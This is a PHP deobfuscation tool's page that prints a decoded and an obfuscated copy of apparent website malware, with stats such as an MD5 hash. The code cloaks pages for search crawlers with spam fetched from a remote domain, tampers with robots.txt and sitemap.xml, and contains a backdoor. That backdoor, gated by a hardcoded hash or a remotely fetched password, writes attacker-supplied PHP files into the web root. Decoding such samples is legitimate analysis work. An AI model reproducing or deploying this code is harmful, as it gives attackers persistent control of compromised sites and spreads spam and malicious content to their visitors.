Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto rYoYx; ETYM8: @ignore_user_abort(1); goto adyig; m8mGN: function sbot() { $uAge..

Decoded Output download

<?  goto rYoYx; ETYM8: @ignore_user_abort(1); 
  goto adyig; 
  m8mGN: function sbot() { $uAgent = strtolower($_SERVER["HTTP_USER_AGENT"]); 
     if (stristr($uAgent, "googlebot") || stristr($uAgent, "bing") || stristr($uAgent, "yahoo") || stristr($uAgent, "google") || stristr($uAgent, "Googlebot") || stristr($uAgent, "googlebot")) { return true; 
 } else { return false; 
 } } goto zm2ZY; 
  t5MsG: $lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 
  goto gdihp; 
  Q9xIy: function st_uri() { if (isset($_SERVER["REQUEST_URI"])) { $duri = $_SERVER["REQUEST_URI"]; 
 } else { if (isset($_SERVER["argv"])) { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; 
 } else { $duri = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; 
 } } return $duri; 
 } goto ocs1H; 
  kU22x: $duri_tmp = st_uri(); 
  goto YOnWp; 
  Jv58Y: $duri = urlencode($duri_tmp); 
  goto Q9xIy; 
  xrdVj: $http_web = "http"; 
  goto MC_1m; 
  XXrCH: $htmcontent = trim(dageget($web)); 
  goto PdCO1; 
  YOnWp: if ($duri_tmp == '') { $duri_tmp = "/"; 
 } goto Jv58Y; 
  DNx7c: $web = $http_web . "://" . $goweb . "/indexnew.php?web=" . $host . "&zz=" . sbot() . "&uri=" . $duri . "&urlshang=" . $urlshang . "&http=" . $http . "&lang=" . $lang; 
  goto XXrCH; 
  m8X6J: function pingmap($url) { $url_arr = explode("\xd
", trim($url)); 
     $return_str = ''; 
     foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl); 
     $ok = strpos($pingRes, "Sitemap Notification Received") !== false ? "pingok" : "error"; 
     $return_str .= $pingUrl . "-- " . $ok . "<br>"; 
 } return $return_str; 
 } goto m8mGN; 
  MC_1m: if (is_htps()) { $http = "https"; 
 } else { $http = "http"; 
 } goto kU22x; 
  gdihp: $lang = urlencode($lang); 
  goto CQY2p; 
  ocs1H: $goweb = $xmlname . ".arepinkm" . ".xyz"; 
  goto PxVzk; 
  zm2ZY: function dageget($url) { $file_contents = ''; 
     if (function_exists("curl_init")) { $ch = curl_init(); 
     curl_setopt($ch, CURLOPT_URL, $url); 
     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); 
     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); 
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); 
     $file_contents = curl_exec($ch); 
     curl_close($ch); 
 } if (!$file_contents) { $file_contents = @file_get_contents($url); 
 } return $file_contents; 
 } goto M1O34; 
  rYoYx: @set_time_limit(3600); 
  goto ETYM8; 
  UaxdW: $host = $_SERVER["HTTP_HOST"]; 
  goto t5MsG; 
  COD3z: if (isset($_SERVER["HTTP_REFERER"])) { $urlshang = $_SERVER["HTTP_REFERER"]; 
     $urlshang = urlencode($urlshang); 
 } goto Psz17; 
  PxVzk: function is_htps() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; 
 } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; 
 } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; 
 } return false; 
 } goto UaxdW; 
  adyig: $xmlname = "xmtd"; 
  goto xrdVj; 
  PdCO1: if (!strstr($htmcontent, "nobotuseragent")) { if (strstr($htmcontent, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); 
     $htmcontent = str_replace("okhtmlgetcontent", '', $htmcontent); 
     echo $htmcontent; 
     die; 
 } else { if (strstr($htmcontent, "okxmlgetcontent")) { $htmcontent = str_replace("okxmlgetcontent", '', $htmcontent); 
     @header("Content-type: text/xml"); 
     echo $htmcontent; 
     die; 
 } else { if (strstr($htmcontent, "pingxmlgetcontent")) { $htmcontent = str_replace("pingxmlgetcontent", '', $htmcontent); 
     @header("Content-type: text/html; charset=utf-8"); 
     echo pingmap($htmcontent); 
     die; 
 } } } } goto m8X6J; 
  CQY2p: $urlshang = ''; 
  goto COD3z; 
  Psz17: if (@$_GET["pd"] != '') { $add_content = @$_GET["mapname"]; 
     $action = @$_GET["action"]; 
     if (isset($_SERVER["DOCUMENT_ROOT"])) { $path = $_SERVER["DOCUMENT_ROOT"]; 
 } else { $path = dirname(__FILE__); 
 } if (!$action) { $action = "put"; 
 } if ($action == "put") { if (strstr($add_content, ".xml")) { $map_path = $path . "/sitemap.xml"; 
     if (is_file($map_path)) { @unlink($map_path); 
 } $file_path = $path . "/robots.txt"; 
  if (file_exists($file_path)) { $data = dageget($file_path); 
 } else { $data = "User-agent: *Allow: /"; 
 } $sitmap_url = $http . "://" . $host . "/" . $add_content; 
  if (stristr($data, $sitmap_url)) { echo "<br>sitemap already added!<br>"; 
 } else { if (file_put_contents($file_path, trim($data) . "
" . "Sitemap: " . $sitmap_url)) { echo "<br>ok<br>"; 
 } else { echo "<br>file write false!<br>"; 
 } } } else { echo "<br>sitemap name false!<br>"; 
 } if (strstr($add_content, ".p" . "hp")) { $a = sha1(sha1(@$_GET["a"])); 
     $b = sha1(sha1(@$_GET["b"])); 
     if ($a == dageget($http_web . "://" . $goweb . "/a.p" . "hp") || $b == "808735b17c8943e3715388958dc22d879a8c9eaa") { $dstr = @$_GET["dstr"]; 
     if (file_put_contents($path . "/" . $add_content, $dstr)) { echo "ok"; } } } } die; } goto DNx7c; M1O34:  
 //he005  ?>

Did this file decode correctly?

Original Code

goto rYoYx; ETYM8: @ignore_user_abort(1);
  goto adyig;
  m8mGN: function sbot() { $uAgent = strtolower($_SERVER["\x48\x54\124\x50\x5f\125\x53\105\x52\x5f\101\107\105\116\124"]);
     if (stristr($uAgent, "\x67\157\157\x67\154\x65\x62\x6f\x74") || stristr($uAgent, "\x62\x69\156\147") || stristr($uAgent, "\x79\141\x68\x6f\157") || stristr($uAgent, "\147\x6f\x6f\x67\x6c\145") || stristr($uAgent, "\x47\157\157\147\154\x65\142\157\164") || stristr($uAgent, "\x67\x6f\x6f\147\x6c\x65\x62\x6f\164")) { return true;
 } else { return false;
 } } goto zm2ZY;
  t5MsG: $lang = @$_SERVER["\110\124\x54\120\137\101\103\103\x45\x50\x54\137\114\x41\116\107\x55\x41\x47\105"];
  goto gdihp;
  Q9xIy: function st_uri() { if (isset($_SERVER["\x52\105\121\125\105\x53\x54\x5f\x55\x52\111"])) { $duri = $_SERVER["\122\105\121\x55\105\x53\124\x5f\125\122\111"];
 } else { if (isset($_SERVER["\x61\162\147\166"])) { $duri = $_SERVER["\120\x48\x50\137\123\x45\114\x46"] . "\x3f" . $_SERVER["\x61\162\x67\166"][0];
 } else { $duri = $_SERVER["\x50\110\x50\137\x53\x45\114\x46"] . "\x3f" . $_SERVER["\x51\x55\x45\x52\x59\x5f\123\124\x52\111\116\107"];
 } } return $duri;
 } goto ocs1H;
  kU22x: $duri_tmp = st_uri();
  goto YOnWp;
  Jv58Y: $duri = urlencode($duri_tmp);
  goto Q9xIy;
  xrdVj: $http_web = "\x68\x74\164\x70";
  goto MC_1m;
  XXrCH: $htmcontent = trim(dageget($web));
  goto PdCO1;
  YOnWp: if ($duri_tmp == '') { $duri_tmp = "\x2f";
 } goto Jv58Y;
  DNx7c: $web = $http_web . "\72\57\57" . $goweb . "\x2f\151\x6e\x64\145\170\156\145\x77\56\160\150\160\x3f\x77\x65\x62\x3d" . $host . "\46\x7a\172\75" . sbot() . "\x26\165\162\x69\75" . $duri . "\46\165\x72\154\163\x68\x61\156\x67\75" . $urlshang . "\x26\150\164\164\x70\x3d" . $http . "\x26\x6c\141\156\147\x3d" . $lang;
  goto XXrCH;
  m8X6J: function pingmap($url) { $url_arr = explode("\xd\12", trim($url));
     $return_str = '';
     foreach ($url_arr as $pingUrl) { $pingRes = dageget($pingUrl);
     $ok = strpos($pingRes, "\x53\151\164\145\x6d\141\x70\x20\x4e\x6f\164\151\x66\151\x63\141\x74\151\x6f\156\x20\x52\x65\x63\145\x69\x76\x65\x64") !== false ? "\160\151\x6e\x67\157\153" : "\x65\162\162\157\x72";
     $return_str .= $pingUrl . "\x2d\55\x20" . $ok . "\74\x62\162\76";
 } return $return_str;
 } goto m8mGN;
  MC_1m: if (is_htps()) { $http = "\x68\x74\x74\160\163";
 } else { $http = "\x68\164\x74\160";
 } goto kU22x;
  gdihp: $lang = urlencode($lang);
  goto CQY2p;
  ocs1H: $goweb = $xmlname . "\x2e\141\162\145\160\x69\x6e\153\155" . "\x2e\x78\x79\x7a";
  goto PxVzk;
  zm2ZY: function dageget($url) { $file_contents = '';
     if (function_exists("\143\x75\162\154\137\151\x6e\x69\x74")) { $ch = curl_init();
     curl_setopt($ch, CURLOPT_URL, $url);
     curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
     curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
     $file_contents = curl_exec($ch);
     curl_close($ch);
 } if (!$file_contents) { $file_contents = @file_get_contents($url);
 } return $file_contents;
 } goto M1O34;
  rYoYx: @set_time_limit(3600);
  goto ETYM8;
  UaxdW: $host = $_SERVER["\x48\x54\x54\x50\137\110\x4f\x53\x54"];
  goto t5MsG;
  COD3z: if (isset($_SERVER["\x48\x54\x54\x50\x5f\x52\105\x46\105\122\105\x52"])) { $urlshang = $_SERVER["\x48\124\x54\x50\x5f\122\x45\x46\105\122\x45\122"];
     $urlshang = urlencode($urlshang);
 } goto Psz17;
  PxVzk: function is_htps() { if (isset($_SERVER["\x48\124\x54\120\123"]) && strtolower($_SERVER["\110\x54\124\x50\123"]) !== "\157\x66\x66") { return true;
 } elseif (isset($_SERVER["\110\x54\124\120\x5f\130\137\x46\x4f\122\127\x41\122\104\x45\x44\137\x50\122\x4f\x54\x4f"]) && $_SERVER["\x48\124\x54\x50\137\x58\x5f\x46\x4f\122\x57\101\122\x44\105\x44\x5f\120\122\x4f\x54\117"] === "\150\164\x74\160\x73") { return true;
 } elseif (isset($_SERVER["\110\x54\124\120\x5f\106\x52\117\x4e\124\x5f\x45\116\104\x5f\x48\124\124\x50\x53"]) && strtolower($_SERVER["\x48\124\124\x50\x5f\x46\x52\117\116\124\x5f\105\x4e\x44\x5f\x48\124\124\120\x53"]) !== "\157\x66\x66") { return true;
 } return false;
 } goto UaxdW;
  adyig: $xmlname = "\x78\155\164\144";
  goto xrdVj;
  PdCO1: if (!strstr($htmcontent, "\156\157\x62\x6f\x74\x75\x73\x65\162\x61\147\145\x6e\164")) { if (strstr($htmcontent, "\x6f\x6b\150\164\x6d\x6c\x67\x65\x74\143\x6f\x6e\x74\145\156\x74")) { @header("\103\x6f\x6e\164\145\x6e\x74\x2d\164\x79\x70\x65\x3a\40\164\x65\x78\x74\x2f\x68\164\155\154\x3b\x20\143\150\141\162\163\145\x74\x3d\x75\x74\146\55\x38");
     $htmcontent = str_replace("\157\x6b\x68\164\x6d\x6c\147\x65\164\x63\x6f\x6e\164\x65\156\164", '', $htmcontent);
     echo $htmcontent;
     die;
 } else { if (strstr($htmcontent, "\x6f\x6b\x78\x6d\x6c\147\x65\x74\143\x6f\156\x74\145\156\x74")) { $htmcontent = str_replace("\x6f\153\170\x6d\154\147\145\164\x63\157\x6e\x74\x65\156\x74", '', $htmcontent);
     @header("\x43\157\x6e\x74\145\x6e\x74\x2d\x74\x79\160\x65\x3a\40\x74\145\x78\164\x2f\170\155\x6c");
     echo $htmcontent;
     die;
 } else { if (strstr($htmcontent, "\x70\x69\156\x67\x78\155\154\x67\145\x74\143\157\156\164\145\x6e\164")) { $htmcontent = str_replace("\x70\x69\x6e\x67\x78\x6d\x6c\147\x65\x74\x63\157\x6e\164\145\x6e\164", '', $htmcontent);
     @header("\x43\x6f\x6e\164\145\x6e\x74\x2d\x74\171\160\x65\x3a\40\164\145\170\x74\57\x68\x74\155\x6c\73\x20\143\x68\x61\162\163\x65\x74\75\165\x74\146\55\70");
     echo pingmap($htmcontent);
     die;
 } } } } goto m8X6J;
  CQY2p: $urlshang = '';
  goto COD3z;
  Psz17: if (@$_GET["\160\144"] != '') { $add_content = @$_GET["\x6d\141\160\156\141\x6d\145"];
     $action = @$_GET["\141\143\x74\x69\157\156"];
     if (isset($_SERVER["\104\117\103\125\115\105\116\124\x5f\x52\117\117\124"])) { $path = $_SERVER["\x44\x4f\x43\125\x4d\105\x4e\x54\x5f\x52\117\117\x54"];
 } else { $path = dirname(__FILE__);
 } if (!$action) { $action = "\160\x75\x74";
 } if ($action == "\160\x75\x74") { if (strstr($add_content, "\56\x78\x6d\154")) { $map_path = $path . "\x2f\x73\151\164\145\155\141\160\x2e\170\155\154";
     if (is_file($map_path)) { @unlink($map_path);
 } $file_path = $path . "\57\162\157\x62\x6f\x74\163\56\164\170\164";
  if (file_exists($file_path)) { $data = dageget($file_path);
 } else { $data = "\125\x73\x65\x72\55\x61\x67\x65\x6e\164\72\x20\x2a\101\154\x6c\157\167\x3a\x20\57";
 } $sitmap_url = $http . "\x3a\57\x2f" . $host . "\57" . $add_content;
  if (stristr($data, $sitmap_url)) { echo "\x3c\x62\x72\76\163\x69\164\145\155\141\160\40\x61\x6c\x72\145\x61\x64\x79\x20\x61\x64\144\x65\144\x21\x3c\x62\x72\76";
 } else { if (file_put_contents($file_path, trim($data) . "\15\12" . "\x53\x69\164\145\155\141\160\72\40" . $sitmap_url)) { echo "\x3c\x62\162\76\x6f\x6b\74\142\162\76";
 } else { echo "\74\142\162\x3e\146\151\154\145\x20\x77\x72\151\x74\145\x20\146\x61\x6c\x73\145\41\74\x62\162\x3e";
 } } } else { echo "\74\x62\x72\x3e\163\151\x74\145\155\141\160\x20\x6e\141\x6d\x65\40\x66\x61\154\x73\x65\x21\x3c\142\x72\x3e";
 } if (strstr($add_content, "\x2e\x70" . "\x68\x70")) { $a = sha1(sha1(@$_GET["\x61"]));
     $b = sha1(sha1(@$_GET["\142"]));
     if ($a == dageget($http_web . "\x3a\57\x2f" . $goweb . "\x2f\x61\x2e\160" . "\x68\160") || $b == "\x38\x30\x38\x37\x33\65\x62\x31\x37\143\70\x39\64\63\145\x33\67\x31\x35\63\70\70\x39\x35\70\x64\x63\x32\62\x64\70\x37\71\141\x38\143\x39\x65\x61\141") { $dstr = @$_GET["\144\x73\x74\162"];
     if (file_put_contents($path . "\57" . $add_content, $dstr)) { echo "\157\x6b"; } } } } die; } goto DNx7c; M1O34: 
 //he005  ?>

Function Calls

None

Variables

None

Stats

MD5 ce419a700ed96cf2b55b65a3636cf587
Eval Count 0
Decode Time 47 ms